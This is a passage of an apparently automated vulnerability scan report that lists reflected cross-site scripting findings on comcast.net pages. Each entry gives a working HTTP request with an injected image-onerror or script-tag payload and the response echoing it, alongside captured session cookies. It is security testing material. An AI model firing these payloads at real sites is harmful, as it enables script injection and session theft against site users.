<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: forwhatitsworthc6f94--><img src=a onerror=alert(1)>39e088bf6ea -->
...[SNIP]...

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20 was submitted in the REST URL parameter 2. This input was echoed as 3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/forwhatitsworth3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:07 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'forwhatitsworth3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20'</h2>
...[SNIP]...

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b was submitted in the REST URL parameter 2. This input was echoed as af101<img src=a onerror=alert(1)>df8f6893f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/taxcenteraf101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'taxcenteraf101<img src=a onerror=alert(1)>df8f6893f8b'</h2>
...[SNIP]...

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload af54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701 was submitted in the REST URL parameter 2. This input was echoed as af54b--><img src=a onerror=alert(1)>653cf74b701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/taxcenteraf54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:53 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: taxcenteraf54b--><img src=a onerror=alert(1)>653cf74b701 -->
...[SNIP]...

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /local/19103/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e was submitted in the REST URL parameter 2. This input was echoed as b6fbe"><img src=a onerror=alert(1)>af36ff5364e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /local/19103b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:47 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:47 GMT
Content-Length: 28243
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta h
...[SNIP]...
<input type="hidden" name="l" value="19103b6fbe"><img src=a onerror=alert(1)>af36ff5364e" />
...[SNIP]...

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f was submitted in the REST URL parameter 2. This input was echoed as 13854--><img src=a onerror=alert(1)>2c2f086376f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/national13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: national13854--><img src=a onerror=alert(1)>2c2f086376f -->
...[SNIP]...

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931 was submitted in the REST URL parameter 2. This input was echoed as 1613b<img src=a onerror=alert(1)>ca95b061931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/national1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:30 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'national1613b<img src=a onerror=alert(1)>ca95b061931'</h2>
...[SNIP]...

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc26"><script>alert(1)</script>895fb0d3fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national1bc26"><script>alert(1)</script>895fb0d3fa6/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/national1bc26"><script>alert(1)</script>895fb0d3fa6/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cafd"><script>alert(1)</script>c6016ae582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/odd6cafd"><script>alert(1)</script>c6016ae582e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/odd6cafd"><script>alert(1)</script>c6016ae582e/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184 was submitted in the REST URL parameter 2. This input was echoed as 88c7e--><img src=a onerror=alert(1)>edebff5d184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/odd88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:34 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: odd88c7e--><img src=a onerror=alert(1)>edebff5d184 -->
...[SNIP]...

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383 was submitted in the REST URL parameter 2. This input was echoed as 48f02<img src=a onerror=alert(1)>39ff31c1383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/odd48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'odd48f02<img src=a onerror=alert(1)>39ff31c1383'</h2>
...[SNIP]...

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b71"><script>alert(1)</script>f076230e9b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/politicsc7b71"><script>alert(1)</script>f076230e9b9/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/politicsc7b71"><script>alert(1)</script>f076230e9b9/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372 was submitted in the REST URL parameter 2. This input was echoed as 7033f<img src=a onerror=alert(1)>274078d2372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/politics7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:23 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'politics7033f<img src=a onerror=alert(1)>274078d2372'</h2>
...[SNIP]...

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248 was submitted in the REST URL parameter 2. This input was echoed as c34ca--><img src=a onerror=alert(1)>6cceb973248 in the application's response.

